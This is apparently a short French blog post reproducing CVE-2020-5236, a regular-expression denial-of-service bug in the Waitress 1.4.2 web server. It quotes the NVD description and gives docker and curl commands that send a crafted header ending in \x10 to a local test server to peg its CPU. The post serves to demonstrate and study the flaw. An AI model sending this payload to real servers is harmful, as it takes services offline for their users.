
Waitress 1.4.2 ReDoS - CVE-2020-5236 (Exemple de code de blog)
La version 1.4.2 de Waitress permet une attaque DOS lorsque Waitress reçoit un en-tête contenant des caractères invalides. Lorsqu'un en-tête comme "Bad-header: xxxxxxxxxxxxxxx\x10" est reçu, cela amène le moteur d'expression régulière à effectuer un rétropédalage catastrophique, ce qui fait que le processus utilise 100% du temps CPU et bloque toute autre interaction. Cela permet à un attaquant d'envoyer une seule requête avec un en-tête invalide et de mettre le service hors ligne.
par NVD
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"
Afficher l'utilisation CPU du serveur. Exécutez docker stats waitress.
↓ Exécution du PoC
